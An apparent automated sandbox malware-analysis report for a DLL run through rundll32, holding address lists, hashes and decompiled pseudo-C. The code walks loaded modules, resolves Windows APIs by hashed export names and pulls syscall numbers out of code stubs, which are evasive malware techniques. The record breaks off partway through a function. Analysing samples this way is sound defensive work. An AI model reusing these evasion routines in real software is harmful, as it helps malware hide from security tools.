0x6e7d9771
0x6e7d9701
0x6e7d970b
0x6e7d971c
0x6e7d971f
0x6e7d9722
0x6e7d9728
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d972e
0x6e7d972e
0x6e7d972e
0x6e7d9735
0x00000000
0x00000000
0x6e7d9737
0x6e7d973a
0x6e7d9740
0x00000000
0x00000000
0x00000000
0x6e7d9742
0x6e7d9744
0x6e7d974d
0x00000000
0x00000000
0x6e7d9761
0x00000000
0x00000000
0x00000000
0x6e7d9763
0x6e7d96ef
0x00000000
0x00000000
0x00000000
0x6e7d96f5
0x6e7d9689
0x6e7d96b8
0x6e7d96b9
0x6e7d96c2
0x00000000
0x6e7d96d3
0x00000000
0x6e7d96d3
0x6e7d9690
0x6e7d9693
0x6e7d96a6
0x6e7d96a7
0x6e7d96ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d9693
0x6e7d9689
0x6e7d9615
0x6e7d9672
0x6e7d9676
0x6e7d967c
0x00000000
0x6e7d967c
0x6e7d9617
0x6e7d961b
0x6e7d9628
0x6e7d962c
0x6e7d9642
0x6e7d964a
0x6e7d962e
0x6e7d9630
0x6e7d963a
0x6e7d963a
0x6e7d9650
0x6e7d9659
0x6e7d9670
0x00000000
0x00000000
0x00000000
0x6e7d9670
0x6e7d965b
0x6e7d965b
0x00000000
0x6e7d9650

Strings

, xrefs: 6E7D99DB

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 301772d650ec54f78f93b4392afdd22c4c57b449046221d4c03f4d28b2192d4f
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: EA22B03040C3868FD755CF95C6B136ABBE0BFA6310F00886DE8E55B2A5D3B59949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E7D143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E7D0304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e7dd208 == 0 ||  *0x6e7dd2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E7D4FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e7dd2f0 |  *0x6e7dd2f1;
									if(( *0x6e7dd2f0 |  *0x6e7dd2f1) == 0) {
										_t525 =  *0x6e7dd208; // 0x2d51340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e7dd2f0 = 1;
											_t526 = E6E7D361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E7D1C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e7dd208 = _t526;
											 *0x6e7dd2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E7D361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E7D1C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E7CDFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E7CDFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6e7dd20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6e7dd210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E7CE8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E7D306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e7dd2e4 = 1;
					E6E7CF584( &(_t535[0x38]), 0);
					E6E7CF584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E7CF4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E7D306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E7CF828( &(_t535[0xc]), E6E7CF4CC( &(_t535[8])) + 0x14);
								_t369 = E6E7CF4BC( &(_t535[0xc]), E6E7CF4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E7CF654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E7CF584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E7CF654( &(_t535[8]));
							E6E7CF654( &(_t535[0x164]));
							E6E7CF584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E7CF584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6E7D1D34(0x60a28c5c);
							_t290 = E6E7D12EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E7D1C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6E7CD014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E7D5CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E7D5D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E7D8E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E7CF654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E7CBB44( &(_t535[0x110]));
							}
							E6E7CCFDC( &(_t535[0x104]));
							E6E7CCFDC(_t518);
							E6E7CCFDC( &(_t535[0x15c]));
							E6E7CCFDC( &(_t535[0x154]));
							E6E7D90EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E7CF618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E7D90B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E7CF4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E7CF4CC( &(_t535[0x44]));
								_t519 =  *(0x6e7dbd40 + _t381 * 4);
								_t531 = E6E7D907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E7D87E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E7CF4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E7CF4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E7CF4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E7CF828( &(_t535[0x20]), E6E7CF4CC( &(_t535[0x1c])) + 8);
										E6E7CF4BC( &(_t535[0x20]), E6E7CF4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E7D317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E7CF828( &(_t535[0x48]), _t535[0x70]);
									E6E7D317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E7CF840( &(_t535[0x44]), _t563);
									E6E7CF840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E7D913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E7D9104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E7CF654( &(_t535[0x144]));
									E6E7CF654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e7dd2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E7CF654( &(_t535[0x11c]));
							E6E7D8E68(_t381,  &(_t535[0xd8]));
							E6E7CF654( &(_t535[0x1c]));
							E6E7CF654( &(_t535[0x44]));
							E6E7CF654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E7CF4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E7CF828( &(_t535[0x38]), E6E7CF4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6E7CF4BC( &(_t535[0x38]), E6E7CF4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E7CF4BC( &(_t535[0xc]), _t62);
						_t455 = E6E7CF4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6e7d1448
0x6e7d144f
0x6e7d1452
0x6e7d1459
0x6e7d1bdb
0x6e7d1bdb
0x6e7d145f
0x6e7d146a
0x6e7d19a9
0x6e7d19ad
0x00000000
0x6e7d1c2c
0x6e7d19b3
0x6e7d19b6
0x6e7d19b9
0x6e7d19c3
0x6e7d19d2
0x6e7d19d4
0x6e7d19db
0x6e7d1bc5
0x6e7d1bc7
0x6e7d1bca
0x6e7d1bce
0x00000000
0x6e7d1bce
0x6e7d19ea
0x6e7d19f5
0x6e7d19fc
0x6e7d19ff
0x6e7d1a01
0x6e7d1a04
0x6e7d1a07
0x6e7d1a0d
0x6e7d1a1b
0x6e7d1a2b
0x6e7d1a50
0x6e7d1a61
0x6e7d1a64
0x6e7d1a66
0x6e7d1aca
0x6e7d1acd
0x6e7d1acd
0x6e7d1acf
0x6e7d1ad2
0x6e7d1ad6
0x6e7d1ad6
0x6e7d1ada
0x00000000
0x00000000
0x6e7d1ae7
0x6e7d1aed
0x6e7d1b21
0x6e7d1b27
0x6e7d1b29
0x6e7d1bf8
0x6e7d1c00
0x6e7d1c03
0x6e7d1c05
0x6e7d1c1c
0x6e7d1c1c
0x6e7d1c07
0x6e7d1c0b
0x6e7d1c10
0x6e7d1c10
0x6e7d1c1e
0x6e7d1c24
0x6e7d1b43
0x6e7d1b43
0x6e7d1b45
0x6e7d1b45
0x6e7d1b47
0x6e7d1b47
0x6e7d1b4c
0x00000000
0x00000000
0x6e7d1b4e
0x6e7d1b4f
0x6e7d1b52
0x6e7d1b55
0x00000000
0x00000000
0x6e7d1b61
0x6e7d1b64
0x6e7d1b66
0x6e7d1b7d
0x6e7d1b7d
0x6e7d1b68
0x6e7d1b6c
0x6e7d1b71
0x6e7d1b71
0x6e7d1b8a
0x6e7d1b8d
0x6e7d1b96
0x6e7d1b99
0x6e7d1bbc
0x6e7d1bc0
0x00000000
0x6e7d1bc0
0x6e7d1ba1
0x6e7d1ba1
0x6e7d1bad
0x6e7d1bb0
0x6e7d1bb9
0x00000000
0x6e7d1bb9
0x6e7d1b2f
0x6e7d1b3f
0x6e7d1b3f
0x6e7d1b41
0x00000000
0x00000000
0x6e7d1b37
0x6e7d1b39
0x6e7d1b39
0x00000000
0x6e7d1b3f
0x6e7d1aef
0x6e7d1af7
0x6e7d1b17
0x6e7d1af9
0x6e7d1af9
0x6e7d1b01
0x6e7d1b0a
0x6e7d1b0a
0x6e7d1b01
0x00000000
0x6e7d1af7
0x6e7d1a68
0x6e7d1a6f
0x00000000
0x00000000
0x6e7d1a7c
0x6e7d1a82
0x6e7d1a87
0x6e7d1a8e
0x6e7d1a92
0x6e7d1aa7
0x6e7d1aa9
0x6e7d1aab
0x6e7d1ab1
0x6e7d1abf
0x6e7d1abf
0x6e7d1ac5
0x00000000
0x6e7d1ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d1a0f
0x6e7d1a0f
0x6e7d1a0f
0x6e7d1a10
0x6e7d1a13
0x6e7d1a17
0x00000000
0x6e7d1a2d
0x6e7d1a30
0x6e7d1a33
0x6e7d1a3c
0x6e7d1a3f
0x6e7d1a40
0x6e7d1a42
0x00000000
0x6e7d147d
0x6e7d147f
0x6e7d1484
0x6e7d148f
0x6e7d149d
0x6e7d14b0
0x6e7d14bd
0x6e7d14c6
0x6e7d14ca
0x6e7d14ce
0x6e7d1516
0x6e7d1516
0x6e7d1518
0x6e7d151f
0x00000000
0x00000000
0x6e7d1538
0x6e7d1540
0x6e7d1544
0x6e7d1559
0x6e7d155d
0x6e7d1561
0x6e7d156a
0x6e7d1570
0x6e7d1573
0x6e7d1577
0x6e7d157f
0x6e7d1581
0x6e7d1585
0x6e7d158c
0x6e7d1595
0x6e7d1595
0x6e7d1599
0x6e7d15ae
0x6e7d15c4
0x6e7d15d1
0x6e7d15d2
0x6e7d15d2
0x6e7d15d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d158e
0x6e7d158e
0x6e7d158e
0x6e7d158f
0x6e7d1590
0x00000000
0x6e7d158e
0x6e7d1553
0x6e7d1557
0x00000000
0x00000000
0x00000000
0x6e7d15d8
0x6e7d15d8
0x6e7d15d9
0x6e7d15dc
0x6e7d15e6
0x6e7d15e6
0x6e7d15ea
0x6e7d15f1
0x6e7d164c
0x6e7d1651
0x6e7d16a4
0x6e7d16a4
0x6e7d16a8
0x6e7d16ac
0x6e7d14d6
0x6e7d14d9
0x6e7d14de
0x6e7d14e4
0x6e7d14e7
0x6e7d14ee
0x6e7d14f2
0x6e7d14f9
0x6e7d1502
0x6e7d1506
0x6e7d150a
0x6e7d1510
0x00000000
0x00000000
0x00000000
0x6e7d1510
0x6e7d16b6
0x6e7d16c2
0x6e7d16cd
0x6e7d16d4
0x6e7d16dd
0x6e7d16e7
0x6e7d16e8
0x6e7d16f6
0x6e7d16fb
0x6e7d16fc
0x6e7d1709
0x6e7d170e
0x6e7d1720
0x6e7d1725
0x6e7d172a
0x6e7d173c
0x6e7d174e
0x6e7d1753
0x6e7d175e
0x6e7d1765
0x6e7d176a
0x6e7d1772
0x6e7d177b
0x6e7d177b
0x6e7d1787
0x6e7d178e
0x6e7d179a
0x6e7d17a6
0x6e7d17b4
0x6e7d17c5
0x6e7d17cc
0x6e7d17d1
0x6e7d17da
0x6e7d17df
0x6e7d17e1
0x6e7d17e5
0x6e7d17e9
0x6e7d17f6
0x6e7d1803
0x6e7d1807
0x6e7d181b
0x6e7d181f
0x00000000
0x00000000
0x6e7d1834
0x6e7d1836
0x6e7d183e
0x6e7d183b
0x6e7d183b
0x6e7d183b
0x6e7d1842
0x6e7d1844
0x6e7d184a
0x6e7d1850
0x6e7d18ac
0x6e7d18b5
0x6e7d18b9
0x6e7d18c6
0x6e7d18cf
0x6e7d18d4
0x6e7d18d8
0x6e7d18db
0x6e7d193c
0x6e7d1952
0x6e7d195d
0x6e7d195e
0x6e7d195f
0x6e7d1963
0x6e7d1966
0x6e7d1be6
0x6e7d1be9
0x6e7d1be9
0x00000000
0x6e7d1966
0x6e7d18e5
0x6e7d18f5
0x6e7d18fe
0x6e7d1907
0x6e7d1910
0x6e7d1911
0x6e7d1912
0x6e7d1917
0x6e7d191f
0x6e7d1927
0x00000000
0x00000000
0x00000000
0x6e7d1929
0x6e7d1859
0x6e7d185e
0x6e7d1862
0x6e7d1862
0x6e7d1866
0x6e7d1869
0x00000000
0x00000000
0x6e7d188a
0x6e7d188c
0x6e7d1890
0x6e7d1892
0x00000000
0x00000000
0x6e7d1894
0x6e7d189b
0x6e7d18a7
0x00000000
0x6e7d18a7
0x6e7d186e
0x00000000
0x6e7d196c
0x6e7d196c
0x6e7d196d
0x6e7d197d
0x6e7d1989
0x6e7d1992
0x6e7d199b
0x6e7d19a4
0x00000000
0x6e7d19a4
0x6e7d1653
0x6e7d1655
0x6e7d1657
0x6e7d165c
0x6e7d1661
0x6e7d1674
0x6e7d168a
0x6e7d1693
0x6e7d1694
0x6e7d1694
0x6e7d1696
0x6e7d1697
0x6e7d169a
0x6e7d169e
0x00000000
0x6e7d1657
0x6e7d15f3
0x6e7d15fd
0x6e7d15fe
0x6e7d15fe
0x6e7d160b
0x6e7d1617
0x6e7d1619
0x6e7d161b
0x6e7d161f
0x6e7d162f
0x6e7d162f
0x6e7d1636
0x6e7d1639
0x6e7d163a
0x6e7d163e
0x6e7d1648
0x00000000
0x6e7d1648

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9d1c572cf162d553ef7d2abbf376fe9fc95730701503b6881ba737740a5cb8
Instruction ID: 03c09f02e42c3e0394e12f63187e9fd2e93109b80a7e02a48f76394b4a231162
Opcode Fuzzy Hash: 3f9d1c572cf162d553ef7d2abbf376fe9fc95730701503b6881ba737740a5cb8
Instruction Fuzzy Hash: 853269701083458FD714DFA8CA94AEAB7E8BF94704F108D2DE595872B1EB70E949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7C6D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7C6D0C() {

				 *0x6e7dd280 = GetUserNameW;
				 *0x6E7DD284 = MessageBoxW;
				 *0x6E7DD288 = GetLastError;
				 *0x6E7DD28C = CreateFileA;
				 *0x6E7DD290 = DebugBreak;
				 *0x6E7DD294 = FlushFileBuffers;
				 *0x6E7DD298 = FreeEnvironmentStringsA;
				 *0x6E7DD29C = GetConsoleOutputCP;
				 *0x6E7DD2A0 = GetEnvironmentStrings;
				 *0x6E7DD2A4 = GetLocaleInfoA;
				 *0x6E7DD2A8 = GetStartupInfoA;
				 *0x6E7DD2AC = GetStringTypeA;
				 *0x6E7DD2B0 = HeapValidate;
				 *0x6E7DD2B4 = IsBadReadPtr;
				 *0x6E7DD2B8 = LCMapStringA;
				 *0x6E7DD2BC = LoadLibraryA;
				 *0x6E7DD2C0 = OutputDebugStringA;
				return 0x6e7dd280;
			}

0x6e7c6d1d
0x6e7c6d25
0x6e7c6d28
0x6e7c6d37
0x6e7c6d3a
0x6e7c6d49
0x6e7c6d4c
0x6e7c6d5b
0x6e7c6d5e
0x6e7c6d6d
0x6e7c6d70
0x6e7c6d7f
0x6e7c6d82
0x6e7c6d91
0x6e7c6d94
0x6e7c6da3
0x6e7c6da6
0x6e7c6da9

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a782ba9c83467727a2a7374ff88a439ab0f241c97f37b2209126f93fe82d2360
Instruction ID: 96f9cf75399c5408fe04ddd0968792fc13670ef8c0dc62a458c296ed3bea1c00
Opcode Fuzzy Hash: a782ba9c83467727a2a7374ff88a439ab0f241c97f37b2209126f93fe82d2360
Instruction Fuzzy Hash: C311F3B8A15A08CFCB48CF09E1909517BF9FB8E310312C2BAD8098B365E734E845CF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5340 Parent PID: 2920 rundll32.exeCOMMON

Executed Functions

Function 02FE1D3C, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 232
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02FE1D3C(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				char* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				int _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char* _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v192;
				intOrPtr* _t141;
				int _t148;
				int _t156;
				int _t160;
				intOrPtr _t170;
				int _t182;
				unsigned int _t204;
				intOrPtr _t224;
				void* _t236;
